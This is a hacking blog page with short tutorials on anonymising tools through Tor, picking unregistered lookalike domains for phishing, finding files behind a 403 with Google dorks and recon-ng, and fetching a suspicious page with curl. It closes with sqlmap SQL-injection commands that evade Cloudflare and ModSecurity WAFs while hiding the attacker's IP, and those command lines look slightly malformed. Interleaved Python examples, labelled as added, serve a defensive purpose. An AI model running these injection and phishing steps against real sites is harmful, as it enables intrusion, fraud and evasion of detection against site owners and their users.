phat-hacks.com

## A Cyber Security Blog ##

Latest Post


Here's a simple way to improve your anonymity by running your tools through TOR proxy.


1st - From the command line type: sudo apt-get install tor
Note: this installs only the Tor daemon (the SOCKS proxy), not the Tor Browser.

2nd - Start the TOR proxy service: sudo service tor start
The TOR proxy service should now be listening on port 9050. We can check this by typing: sudo netstat -plnt
We should see a line beginning:
tcp        0      0 127.0.0.1:9050

3rd - Add the TOR proxy to the settings of your tools. Most tools have a --proxy switch. The TOR proxy speaks SOCKS5, so some tools need the socks5:// scheme spelled out.

For example, when using wpscan, you'll type:
sudo wpscan --url http://example.com --proxy=socks5://127.0.0.1:9050

There are other times when you don't need to specify socks5. For example, in DirBuster we just set host: 127.0.0.1 and port: 9050 in its proxy settings.

[Image: p6RkF0u.png]
If you are using a Windows system and wish to see which ports are listening, type netstat -abno into the command prompt (run it as Administrator so the -b option can show the owning executable).
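A quick way to confirm the listener is where step 2 expects it, as an added example that is not from the original post: the script parses netstat -plnt output (a constructed sample is embedded so it runs offline) and flags a Tor SOCKS port bound to anything other than loopback. That matters because a SOCKS proxy reachable from the network lets any host on it relay traffic through your Tor instance, and a proxy that is not listening at all means the tools in step 3 fail rather than silently going direct.

```python
import re

# Constructed sample of `sudo netstat -plnt` output (not a real capture).
SAMPLE_NETSTAT = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:9050          0.0.0.0:*               LISTEN      1234/tor
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      987/sshd
tcp6       0      0 :::80                   :::*                    LISTEN      2001/apache2
"""

# One LISTEN line: proto, local address, local port, PID/program.
LINE_RE = re.compile(r"^(tcp6?)\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+LISTEN\s+(\S+)")

LOOPBACK = {"127.0.0.1", "::1"}


def parse_listeners(netstat_output):
    """Return a list of {proto, addr, port, program} dicts, one per LISTEN line."""
    listeners = []
    for line in netstat_output.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header lines and non-listening sockets
        proto, addr, port, program = m.groups()
        listeners.append({"proto": proto, "addr": addr, "port": int(port), "program": program})
    return listeners


def check_socks_listener(netstat_output, port=9050):
    """Classify the SOCKS listener on `port`:
    'missing'  - nothing is listening there (tor not started),
    'loopback' - bound to 127.0.0.1/::1 only (what step 2 expects),
    'exposed'  - bound to a non-loopback address, reachable by other hosts.
    """
    hits = [l for l in parse_listeners(netstat_output) if l["port"] == port]
    if not hits:
        return "missing"
    if all(l["addr"] in LOOPBACK for l in hits):
        return "loopback"
    return "exposed"


if __name__ == "__main__":
    for l in parse_listeners(SAMPLE_NETSTAT):
        print(f"{l['proto']:5} {l['addr']}:{l['port']} {l['program']}")
    print("tor socks listener:", check_socks_listener(SAMPLE_NETSTAT))
```

To use it on a live box, pipe the real output in: `sudo netstat -plnt | python3 check_tor.py` with a `sys.stdin.read()` in place of the sample. The default Tor configuration binds to 127.0.0.1 only; an "exposed" result means SocksPort was changed to listen on another address.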

beware of phishing



Here's a quick and easy way to find a good phishing domain that looks "almost" like the real website.

We can simply use UrlCrazy on Linux.

Let's check the options first. Open the terminal, then type: urlcrazy --help



If we don't require these options, we can just leave them out.
Let's see what domains are similar to google.com, and are available. Type: urlcrazy google.com


The above image is just a short cropping of a heck load of results. The idea here is to ignore the domains that already have DNS info (which means they are taken) and check out the ones that have no DNS or show a ?.
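The same enumeration is what a domain owner runs against their own brand to decide which lookalikes to register or put on a watchlist. The following is an added example, not part of the original post and not urlcrazy's code: it generates a few of the variant classes urlcrazy reports (character omission, adjacent transposition, inserted hyphen, TLD swap) and then splits the candidates the way the post reads the output, "has DNS data" versus "no DNS". The resolver is injectable, and the demo uses a constructed answer set so it runs offline; `dns_resolves` is the only part that touches the network.

```python
import socket


def lookalikes(domain, extra_tlds=("net", "co", "org")):
    """Generate urlcrazy-style lookalike candidates for `domain` (one label
    plus TLD, e.g. 'google.com'). Covers character omission, adjacent
    transposition, inserted hyphen and TLD swap; real tools add many more."""
    label, _, tld = domain.rpartition(".")
    names = set()
    for i in range(len(label)):                      # omission: gogle
        names.add(label[:i] + label[i + 1:])
    for i in range(len(label) - 1):                  # transposition: googel
        names.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])
    for i in range(1, len(label)):                   # hyphenation: goo-gle
        names.add(label[:i] + "-" + label[i:])
    cands = {f"{n}.{tld}" for n in names if n and n != label}
    cands.update(f"{label}.{t}" for t in extra_tlds if t != tld)  # google.net
    return sorted(cands)


def dns_resolves(name):
    """True if the name has an A record (default resolver; needs network)."""
    try:
        socket.gethostbyname(name)
        return True
    except socket.gaierror:
        return False


def split_by_dns(candidates, resolve=dns_resolves):
    """Split candidates into (registered, unregistered) the way the post
    reads urlcrazy output: a name with DNS data is taken, one without is not.
    `resolve` is injectable so the check can run against a fixture offline."""
    taken, free = [], []
    for c in candidates:
        (taken if resolve(c) else free).append(c)
    return taken, free


if __name__ == "__main__":
    cands = lookalikes("google.com")
    # Constructed stand-in for DNS answers so the demo runs offline.
    fake_dns = {"gogle.com", "googel.com", "google.net"}
    taken, free = split_by_dns(cands, resolve=lambda n: n in fake_dns)
    print("registered (monitor for abuse):", taken)
    print("unregistered (candidates to register defensively):", free)
```

Note that "no DNS" is only a hint that a name is unregistered: a registered but unconfigured domain also returns nothing, which is the ? column the post mentions, so a WHOIS check is the final word before spending money on a defensive registration.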

[Image: 403forbidden.png]
 

We have all come across 403 FORBIDDEN at some point while surfing the Internet. Although it is true that we are unable to browse further into the website's directory, by thinking outside of the box we can often still reach files that sit beyond this location.

While doing some reconnaissance on a website, we noticed two interesting directory paths:

www.example.com/documents/  and www.example.com/wp-uploads/


First, we try the /documents/ path, but notice that it is made public, and this is where they keep files for visitors to read.

Second, we try the /wp-uploads/ path, which greets us with:

[Image: Screenshot%2Bfrom%2B2017-03-18%2B14-18-33.png]


Seems we are out of luck, and there is no going forward beyond this point.

However, we can work around this problem. The 403 only blocks the directory listing; individual files under /wp-uploads/ are still served to anyone who knows their exact path. By using Google Dorks, we can see if Google has already indexed any files uploaded onto our target website.

We can go to the Google search engine, then type:

Quote:
site:example.com filetype:pdf OR filetype:docx OR filetype:xlsx OR filetype:pptx OR filetype:doc OR filetype:xls OR filetype:ppt

We can keep adding filetypes until we're satisfied.

Another option we have is to use recon-ng. This would be a more convenient option, as we can keep all our reconnaissance work in one place.

Let's open up recon-ng in our terminal and setup the metacrawler modules:
Quote:
recon-ng
show modules
use recon/domains-contacts/metacrawler
set SOURCE example.com

After typing run, we'll get some results.

[Image: ss.png]

Now we can open these links in our browser. We'll get access to the files, and not be greeted by 403 FORBIDDEN.





We've all seen the above message.

It is possible to see what danger is ahead without continuing the connection in your browser.


We can just use curl to grab the HTML of the page behind the "not secure" warning and save it into an HTML file for us to view offline, without the browser ever rendering it.

Open your terminal on Linux. Type: curl bad.example.com --insecure > notsecure.html

Note: the target URL should be exactly the same as you see in your browser, so just copy & paste it.

Once we open our saved html file, we may be presented by a phishy-looking page.
Phishing Page
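Opening the saved file in a browser still renders whatever is in it, so it helps to triage the HTML first. This is an added example, not from the original post: it parses a saved page with the standard library's HTMLParser, never executes scripts, and reports the three things that most often give a phishing page away, a credential form that posts to a different host, a credential form that posts over plain http, and script tags loaded from elsewhere. The page URL and HTML are constructed samples; on a real capture you would read notsecure.html from disk and pass the URL you fetched.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed stand-in for a saved notsecure.html (not a real capture).
PAGE_URL = "http://bad.example.com/login"
SAMPLE_HTML = """
<html><head><title>Secure Bank - Sign in</title>
<script src="https://cdn.example.org/track.js"></script></head>
<body><img src="/logo.png">
<form action="http://collector.example.net/submit.php" method="post">
  <input type="text" name="user"><input type="password" name="pass">
  <input type="submit" value="Sign in">
</form></body></html>
"""


class FormScanner(HTMLParser):
    """Collect every form (resolved action, method, input fields) and every
    external script source, without executing anything."""

    def __init__(self, base_url):
        super().__init__()
        self.base = base_url
        self.forms = []
        self.scripts = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": urljoin(self.base, a.get("action") or ""),
                          "method": (a.get("method") or "get").lower(),
                          "fields": []}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            self._form["fields"].append(((a.get("type") or "text").lower(), a.get("name") or ""))
        elif tag == "script" and a.get("src"):
            self.scripts.append(urljoin(self.base, a["src"]))

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def assess(html, page_url):
    """Return (kind, detail) findings: credential forms posting to another
    host, credential forms posting over plain http, and off-host scripts."""
    scanner = FormScanner(page_url)
    scanner.feed(html)
    host = urlparse(page_url).hostname
    findings = []
    for f in scanner.forms:
        if not any(t == "password" for t, _ in f["fields"]):
            continue  # no credential capture in this form
        target = urlparse(f["action"])
        if target.hostname != host:
            findings.append(("offsite_credential_post", f["action"]))
        elif target.scheme == "http":
            findings.append(("plaintext_credential_post", f["action"]))
    for src in scanner.scripts:
        if urlparse(src).hostname != host:
            findings.append(("external_script", src))
    return findings


if __name__ == "__main__":
    for kind, detail in assess(SAMPLE_HTML, PAGE_URL):
        print(f"{kind}: {detail}")
```

An off-site credential post is the strongest single indicator; the external-script finding is noisy on legitimate sites that use CDNs, so treat it as context rather than a verdict.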

bypass cloudflare


If SQLMAP informs you that the target is protected by a WAF/IPS/IDS, it can be difficult to perform the injection.
Checking for a possible WAF can be done with the --identify-waf switch. If there is one in place, the three most likely results are:
  • Cloudflare
  • Mod Security
  • Unidentified
The --tor switch should also be used to avoid having your IP address banned.


Cloudflare bypass:
https://www.------.com/index.php?id=1" --tor --random-agent --check-waf --tamper="between,randomcase,space2comment"

Mod Security bypass:
https://www.------.com/index.php?id=1" --tor --random-agent --check-waf --tamper="modsecurityzeroversioned,modsecurityversioned"

I find that Mod Security scripts work well for 'Unidentified'.

Unidentified bypass:
https://www.------.com/index.php?id=1" --tor --random-agent --check-waf --tamper="modsecurityzeroversioned,modsecurityversioned"

If you want to be noisy and try every script available, you can do the following. Make sure you have the latest version of SQLMAP.

Hail Mary:
https://www.------.com/index.php?id=1" --tor --random-agent --check-waf --tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords"

Phat Hacks
